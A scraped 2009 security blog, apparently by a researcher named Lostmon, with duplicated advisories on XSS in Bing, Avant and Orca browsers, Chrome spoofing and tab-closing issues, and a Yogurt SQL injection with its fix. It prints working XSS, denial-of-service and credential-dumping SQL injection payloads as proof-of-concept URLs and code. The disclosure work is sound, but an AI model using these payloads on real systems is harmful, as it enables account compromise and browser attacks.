LiveSearchSiteAuth.xml this file have the malicious code.
#########
solution:
##########
Vendor patch
#############
timeline:
#############
discovered: 18-jun-2009
vendor notified: 07-08-2009
vendor response: 07-08-2009
vendor patch response: 13-08-2009
disclosure: 13-08-2009
################ End #####################
Thnx to Microsoft Security Response Center (MSRC)
http://blogs.technet.com/msrc/
thnx to estrella to be my ligth
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Bing.com WebmasterAuthenticationInformationPage.aspx XSS
vendor url:http://ww.bing.com
advisore:http://lostmon.blogspot.com/2009/08/
bingcom-webmasterauthenticationinformat.html
vendor notify: yes vendor confirmed:yes
###########################################
Bing search engine contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does not
validate properly 'authTag' variable upon submission to the
'WebmasterAuthenticationInformationPage.aspx' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.
them a attacker can compose a malformed link in the variable
from WebmasterAuthenticationInformationPage.aspx and Look the
result code , it is write in two boxes and in the file
'LiveSearchSiteAuth.xml'
A remote user can compose a malformed link in the variable
from WebmasterXMLAuthDownloadPage.aspx ,wen download file
LiveSearchSiteAuth.xml this file have the malicious code.
#########
solution:
##########
Vendor patch
#############
timeline:
#############
discovered: 18-jun-2009
vendor notified: 07-08-2009
vendor response: 07-08-2009
vendor patch response: 13-08-2009
disclosure: 13-08-2009
################ End #####################
Thnx to Microsoft Security Response Center (MSRC)
http://blogs.technet.com/msrc/
thnx to estrella to be my ligth
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Internet explorer pwned Avant Browser
Monday, August 03, 2009
###########################################
Internet explorer pwned Avant Browser via
history Persistent XSS vulnerabilities
vendor url: http://www.avantbrowser.com/
Advisore: http://lostmon.blogspot.com/2009/08/
internet-explorer-pwned-avant-browser.html
vendor notify: NO exploit available: yes
############################################
#############
description
#############
Avant Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.
A recently vulnerability in Avant browser discovered by me
Can be exploit via history on ie8
Related Vuln =>
http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
###############
version tested
###############
Internet Explorer 8 (in xp home)
Avant Browser 11.7 build 35
#########
solution:
##########
Update to version 11.7 build 36
it is reported and tested that isn´t
vulnerable.
#############
timeline:
#############
discovered: 23-07-2009
disclosure: 03-08-2009
##################
testing
##################
http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
See this related vulnerability in avant browser.Now go
to exploit it across explorer , we know that the column
history is afected by a script insercion in browser:home
dinamicaly content.
If a user open explorer and try to navigate to a malicious
site like :
http://usuarios.lycos.es/reyfuss/id.php?id="><h1>Test html injection</h1>
For example if we Browse this url with avant browser =>
http://usuarios.lycos.es/reyfuss/id.php?id="><iframe src='http://www.google.com'></iframe>
The iframe does not executed correctly in history, but ,
close avant, browse the url with IE8 and them , open
avant browser ...the iframe now is executed correctly :D
Those url are saved in the explorer history, here is the
vulnerability, because Avant browser use IE8 web history
to show his own history in the browser:home history column,
them open avant browser and the html is executed in the history
colum and in most visited sites.
I don´t know if with the anty-xss filter in IE8 can protect
from a script attack but at this moment we can think that this
issue can have a html injection condition and a attacker can insert
a iframe...And this is other vector to attack Avant browser.
################ End #####################
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Internet explorer pwned Avant Browser via
history Persistent XSS vulnerabilities
vendor url: http://www.avantbrowser.com/
Advisore: http://lostmon.blogspot.com/2009/08/
internet-explorer-pwned-avant-browser.html
vendor notify: NO exploit available: yes
############################################
#############
description
#############
Avant Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.
A recently vulnerability in Avant browser discovered by me
Can be exploit via history on ie8
Related Vuln =>
http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
###############
version tested
###############
Internet Explorer 8 (in xp home)
Avant Browser 11.7 build 35
#########
solution:
##########
Update to version 11.7 build 36
it is reported and tested that isn´t
vulnerable.
#############
timeline:
#############
discovered: 23-07-2009
disclosure: 03-08-2009
##################
testing
##################
http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
See this related vulnerability in avant browser.Now go
to exploit it across explorer , we know that the column
history is afected by a script insercion in browser:home
dinamicaly content.
If a user open explorer and try to navigate to a malicious
site like :
http://usuarios.lycos.es/reyfuss/id.php?id="><h1>Test html injection</h1>
For example if we Browse this url with avant browser =>
http://usuarios.lycos.es/reyfuss/id.php?id="><iframe src='http://www.google.com'></iframe>
The iframe does not executed correctly in history, but ,
close avant, browse the url with IE8 and them , open
avant browser ...the iframe now is executed correctly :D
Those url are saved in the explorer history, here is the
vulnerability, because Avant browser use IE8 web history
to show his own history in the browser:home history column,
them open avant browser and the html is executed in the history
colum and in most visited sites.
I don´t know if with the anty-xss filter in IE8 can protect
from a script attack but at this moment we can think that this
issue can have a html injection condition and a attacker can insert
a iframe...And this is other vector to attack Avant browser.
################ End #####################
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Orca Browser browser:home Persistent XSS vulnerability
Friday, July 31, 2009
###########################################
Orca Browser browser:home Persistent XSS vulnerability
vendor url: http://www.orcabrowser.com/
Advisore: http://lostmon.blogspot.com/2009/07/
orca-browser-browserhome-persistent-xss.html
vendor notify: NO exploit available: yes
############################################
#############
description
#############
Orca Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.
Orca Browser contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly the url links upon submission to the
bookmarks in browser:home page.
This could allow a user to create a specially crafted URL or a
bookmark that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server
wen try to load browser:home ,leading to a loss of integrity.
###############
version tested
###############
Avant Browser 1.2 build 2
#########
solution:
##########
Update to version 1.2. build 3
this version address this vulnerability.
#############
timeline:
#############
discovered: 23-jul-2009
disclosure: 30 jul 2009
##################
testing
##################
Demostration Video => http://www.spymac.com/details/?2417793
Open Orca Browser and by default the browser load
'browser:home' page. in this page we can view tree
columns , 1 top sites 2 history and 3 recent bookmarks.
Bookmarks column is vulnerable to a xss. let´s go
to demostrate.
I make a web page posible vulnerable to a xss condition
<?
$cmd=$_GET[id]
?>
I place a online doc for demo here =>
http://usuarios.lycos.es/reyfuss/id.php?id=
open Orca browser and navigate to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
click in bookmark Tool bar and click in new bookmark and add this url.
Load browser:home or close and open the browser , the script
is executed in bookmarks column.
################ End #####################
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Orca Browser browser:home Persistent XSS vulnerability
vendor url: http://www.orcabrowser.com/
Advisore: http://lostmon.blogspot.com/2009/07/
orca-browser-browserhome-persistent-xss.html
vendor notify: NO exploit available: yes
############################################
#############
description
#############
Orca Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.
Orca Browser contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly the url links upon submission to the
bookmarks in browser:home page.
This could allow a user to create a specially crafted URL or a
bookmark that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server
wen try to load browser:home ,leading to a loss of integrity.
###############
version tested
###############
Avant Browser 1.2 build 2
#########
solution:
##########
Update to version 1.2. build 3
this version address this vulnerability.
#############
timeline:
#############
discovered: 23-jul-2009
disclosure: 30 jul 2009
##################
testing
##################
Demostration Video => http://www.spymac.com/details/?2417793
Open Orca Browser and by default the browser load
'browser:home' page. in this page we can view tree
columns , 1 top sites 2 history and 3 recent bookmarks.
Bookmarks column is vulnerable to a xss. let´s go
to demostrate.
I make a web page posible vulnerable to a xss condition
<?
$cmd=$_GET[id]
?>
I place a online doc for demo here =>
http://usuarios.lycos.es/reyfuss/id.php?id=
open Orca browser and navigate to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
click in bookmark Tool bar and click in new bookmark and add this url.
Load browser:home or close and open the browser , the script
is executed in bookmarks column.
################ End #####################
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Avant Browser browser:home Persistent XSS vulnerabilities
Thursday, July 30, 2009
###########################################
Avant Browser browser:home Persistent XSS vulnerabilities
vendor url: http://www.avantbrowser.com/
Advisore: http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
vendor notify: NO exploit available: yes
############################################
#############
description
#############
Avant Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.
Avant Browse contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly the url links upon submission to the
history, bookmarks and top sites visited in browser:home page.
This could allow a user to create a specially crafted URL or a
bookmark that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server
wen try to load browser:home ,leading to a loss of integrity.
###############
version tested
###############
Avant Browser 11.7 build 35
#########
solution:
##########
Update to version 11.7 build 36
it is reported and tested that isn´t
vulnerable.
#############
timeline:
#############
discovered: 23-jul-2009
disclosure: 30 jul 2009
##################
testing
##################
Demostration Video => http://www.spymac.com/details/?2417793
Open Avant Browser and by default the browser load
'browser:home' page. in this page we can view tree
columns , 1 top sites 2 history and 3 recent bookmarks.
All tree colums are prone vulnerables to a xss let´s go
to demostrate it in the tree cases.
I make a web page posible vulnerable to a xss condition
<?
$cmd=$_GET[id]
?>
I place a online doc for demo here =>
http://usuarios.lycos.es/reyfuss/id.php?id=
open avant browser and navigate to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
wait until load , and them close the browser
or open Browser:home URI.
The script is executed and we have two columns afected,
the first and the second.
go to tools menu and delete history ...
open avant browser and go to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
rigth click and select add bookmark and add it.
load again browser:home and the xss is executed
in bookmarks column.
So if we for example like to deny the access to
browser:home we can load =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script>
and wen open the broser and load browser:home on load,
the script close it.
so if we like to denial the service we can load =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script>
################ End #####################
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Avant Browser browser:home Persistent XSS vulnerabilities
vendor url: http://www.avantbrowser.com/
Advisore: http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
vendor notify: NO exploit available: yes
############################################
#############
description
#############
Avant Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.
Avant Browse contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly the url links upon submission to the
history, bookmarks and top sites visited in browser:home page.
This could allow a user to create a specially crafted URL or a
bookmark that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server
wen try to load browser:home ,leading to a loss of integrity.
###############
version tested
###############
Avant Browser 11.7 build 35
#########
solution:
##########
Update to version 11.7 build 36
it is reported and tested that isn´t
vulnerable.
#############
timeline:
#############
discovered: 23-jul-2009
disclosure: 30 jul 2009
##################
testing
##################
Demostration Video => http://www.spymac.com/details/?2417793
Open Avant Browser and by default the browser load
'browser:home' page. in this page we can view tree
columns , 1 top sites 2 history and 3 recent bookmarks.
All tree colums are prone vulnerables to a xss let´s go
to demostrate it in the tree cases.
I make a web page posible vulnerable to a xss condition
<?
$cmd=$_GET[id]
?>
I place a online doc for demo here =>
http://usuarios.lycos.es/reyfuss/id.php?id=
open avant browser and navigate to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
wait until load , and them close the browser
or open Browser:home URI.
The script is executed and we have two columns afected,
the first and the second.
go to tools menu and delete history ...
open avant browser and go to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
rigth click and select add bookmark and add it.
load again browser:home and the xss is executed
in bookmarks column.
So if we for example like to deny the access to
browser:home we can load =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script>
and wen open the broser and load browser:home on load,
the script close it.
so if we like to denial the service we can load =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script>
################ End #####################
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Bing.com Search engine, cache.aspx XSS
Wednesday, July 29, 2009
###########################################
Bing.com Search engine, cache.aspx XSS
vendor url:http://ww.bing.com
advisore:http://lostmon.blogspot.com/2009/07/
bingcom-search-engine-cacheaspx-xss.html
vendor notify: yes vendor confirmed:yes
###########################################
Bing search engine contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does not
validate properly 'q' variable upon submission to the 'cache.aspx'
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading to
a loss of integrity.
#########
solution:
##########
No Solution At this Time.
but microsoft planing to patch it
in the new release code from bing.
#############
timeline:
#############
discovered: 08-jun-2009
vendor notified: 11 jun 2009
vendor response: 11 jun 2009
vendor last response: 30 jun 2009
disclosure: 29 jul 2009
################ End #####################
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Bing.com Search engine, cache.aspx XSS
vendor url:http://ww.bing.com
advisore:http://lostmon.blogspot.com/2009/07/
bingcom-search-engine-cacheaspx-xss.html
vendor notify: yes vendor confirmed:yes
###########################################
Bing search engine contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does not
validate properly 'q' variable upon submission to the 'cache.aspx'
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading to
a loss of integrity.
#########
solution:
##########
No Solution At this Time.
but microsoft planing to patch it
in the new release code from bing.
#############
timeline:
#############
discovered: 08-jun-2009
vendor notified: 11 jun 2009
vendor response: 11 jun 2009
vendor last response: 30 jun 2009
disclosure: 29 jul 2009
################ End #####################
thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Google Chrome About:blank spoof
Tuesday, July 28, 2009
#######################################
Google Chrome About:blank spoof
vendor url:www.google.com
advisore:http://lostmon.blogspot.com/2009/07/
google-chrome-aboutblank-spoof.html
vendor nbotify:YES exploit avalilable:YES
########################################
issue :=>http://code.google.com/p/chromium/issues/detail?id=17876
Chrome Version :2.0.172.37 (Build oficial )
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 4: FAIL
Firefox 3.x: FAIL
IE 7: OK
IE 8: OK
What steps will reproduce the problem?
1.Open The exploit page
2.click in the link
3.look about:blank page
What is the expected result?
show a error page or search in google
What happens instead?
Write in About:blank Page
Please provide any additional information below. Attach a screenshot if
possible.
########################
Sample code
########################
</script>
<center>
<h1>Chrome about:blank Spoof</h1>
</center>
This vulnerability is based on http://www.securityfocus.com/bid/35829/ and
http://www.securityfocus.com/bid/35803
by Juan Pablo Lopez Yacubian and Michael Wood.
<p>
<a href='javascript:spoof()'><<h2>test Spoof !!</h2></a>
<p>
<script>
function spoof()
{
a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,')
a.document.write('<H1>FAKE PAGE<\h1>')
a.document.write('<title>test</title>')
a.stop ();
}
</script>
####################€nd#####################
thank to all Lostmon groups team
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Chrome About:blank spoof
vendor url:www.google.com
advisore:http://lostmon.blogspot.com/2009/07/
google-chrome-aboutblank-spoof.html
vendor nbotify:YES exploit avalilable:YES
########################################
issue :=>http://code.google.com/p/chromium/issues/detail?id=17876
Chrome Version :2.0.172.37 (Build oficial )
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 4: FAIL
Firefox 3.x: FAIL
IE 7: OK
IE 8: OK
What steps will reproduce the problem?
1.Open The exploit page
2.click in the link
3.look about:blank page
What is the expected result?
show a error page or search in google
What happens instead?
Write in About:blank Page
Please provide any additional information below. Attach a screenshot if
possible.
########################
Sample code
########################
</script>
<center>
<h1>Chrome about:blank Spoof</h1>
</center>
This vulnerability is based on http://www.securityfocus.com/bid/35829/ and
http://www.securityfocus.com/bid/35803
by Juan Pablo Lopez Yacubian and Michael Wood.
<p>
<a href='javascript:spoof()'><<h2>test Spoof !!</h2></a>
<p>
<script>
function spoof()
{
a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,')
a.document.write('<H1>FAKE PAGE<\h1>')
a.document.write('<title>test</title>')
a.stop ();
}
</script>
####################€nd#####################
thank to all Lostmon groups team
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Acknowledgments from Microsoft online services.
Wednesday, July 08, 2009Security Researcher Acknowledgments
for Microsoft Online Services
The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has responsibly disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.
http://technet.microsoft.com/en-us/security/cc308575.aspx#0609June 2009 Security Researchers
- Blue Moon Consulting
bluemoon.com.vn - Lostmon Lords
lostmon.blogspot.com - Security Team
dongabank.com.vn - Nenad Vijatov
blog.vijatov.com
--
thank to all Lostmon groups team
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Chrome close() issue
Tuesday, July 07, 2009
##############################
Google Chrome close() issue
VENDOR: http://www.google.com/chrome/
article =http://lostmon.blogspot.com/
2009/07/google-chrome-close-issue.html
##############################
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Chrome close() issue
VENDOR: http://www.google.com/chrome/
article =http://lostmon.blogspot.com/
2009/07/google-chrome-close-issue.html
##############################
Chrome Version : 2.0.172.33 (Build oficial )
URLs (if applicable) :
Other browsers tested:
Safari 4: OK
Firefox 3.x:OK
IE 7: OK
IE 8: OK
What steps will reproduce the problem?
1 - open a web page
2 - navigate to ther page.
Google chrome automatic closes the tab and if we have
only one tab , it closes the process chrome.
What is the expected result?
google chrome don´t close or prompt for close.
What happens instead?
Google chrome closes the tab or if we have only
one tab it closse too without any confirmation.
###########
Abstract
###########
for test all of this need a instaled web server,
and some patience XDD
#############
tesst 1
#############
Create a new html document and write in:
<html><body onload='close()'></body></html>
save it as test1.html in c:\test\ for testing.
1.1 - Open google Chrome and open it with file handler like
file:///c:/test/test1.html
Chrome does not close the window and nothing apears...
1.2 - Open The file in a trust intranet zone via
htttp://localhost/test/test1.html or via ip
http://192.168.1.100/test/test1.html
Chrome does not close the window and nothing apears...
1.3 - Open hard disk and select c:\test\test1.html rigth
click and open with Google Chrome.
Chrome open and close auth.
if we change to other even like onblur ,with onfocus event
it´s interesting because if we try to use inspector to view
the source code, we click in body tag , and we close inspector
the tab is close too,this only aparently afects,wen we open the
html document with test mode 1.3
so this issue aparently can´t exploit in a remote scenario.
###############
test 2
###############
create a new html file and wirte inside , and save it as
test2.html in the test folder.
<html>
<head></head>
<title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title>
<body>
<script>
try { CloseCrome(); } catch(e) {
setTimeout("location.reload();",20);
close(); }
</script>
<h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2>
<p>Google Chrome :2.0.172.33 (Build oficial )<br>
WebKit 530.5<br>V8 1.1.10.13<br>
User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p>
</body>
</html>
2.1 - Open it via file protocol handler file:///c:/test/test2.html ,
Chrome does not close the window and nothing aparently apears.
but if we try to navigate to other site like www.google.com
the tab closes auth.
2.2 - Open it in trust web server http://localhost/test/test2.html ,
or http://192.168.1.100/test/test2.html Chrome does not close
the window and nothing aparently apears ;but if we try to navigate
to other site like www.google.com the tab closes auth.
2.3 - Open hard disk and select c:\test\test2.html rigth
click and open with Google Chrome.
Chrome open and close auth.
##############
conclusion
##############
This issue can be a vulnerability , and this can be used for
example to built malwares that can be tramp the browser in a
determinate location and if the user try to look the code
(onfocus)or try to navigate to other site (test2.html)or other
event,the window can close without interaction,them if a
malware or a malicious web page or a browser hijacker can
load as a default web page and them this can be a
Denial Of Service Condition
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Patch for Yogurt writemessage.php original Parameter SQL Injection
Saturday, June 27, 2009
###################################
Patch for Yogurt writemessage.php
original Parameter SQL Injection
vendor url:http://sourceforge.net/tracker/?group_id=112452
####################################
This is a manual fix for the last discovered sql
injection vulnerability in yogurt social network
#########################
vulnerability references:
#########################
http://osvdb.org/show/osvdb/55098
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-2034
http://www.milw0rm.com/exploits/8932
####################
SQL injection PoC
####################
http://localhost/yogurt/system/writemessage.php?original=
-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,
6,7,8+from+users--
###############
Specific vendor
###############
http://sourceforge.net/tracker/?func=detail&aid=
2813318&group_id=112452&atid=663715
###########
MANUAL FIX
###########
open writemessage.php and look this code =>
Line 79: if (isset($_GET['original']))
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" .
$_GET['original'], $db)
###############
change
################
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" .
intval($_GET['original']), $db)
####################€nd ########################
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Patch for Yogurt writemessage.php
original Parameter SQL Injection
vendor url:http://sourceforge.net/tracker/?group_id=112452
####################################
This is a manual fix for the last discovered sql
injection vulnerability in yogurt social network
#########################
vulnerability references:
#########################
http://osvdb.org/show/osvdb/55098
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-2034
http://www.milw0rm.com/exploits/8932
####################
SQL injection PoC
####################
http://localhost/yogurt/system/writemessage.php?original=
-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,
6,7,8+from+users--
###############
Specific vendor
###############
http://sourceforge.net/tracker/?func=detail&aid=
2813318&group_id=112452&atid=663715
###########
MANUAL FIX
###########
open writemessage.php and look this code =>
Line 79: if (isset($_GET['original']))
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" .
$_GET['original'], $db)
###############
change
################
Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" .
intval($_GET['original']), $db)
####################€nd ########################
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
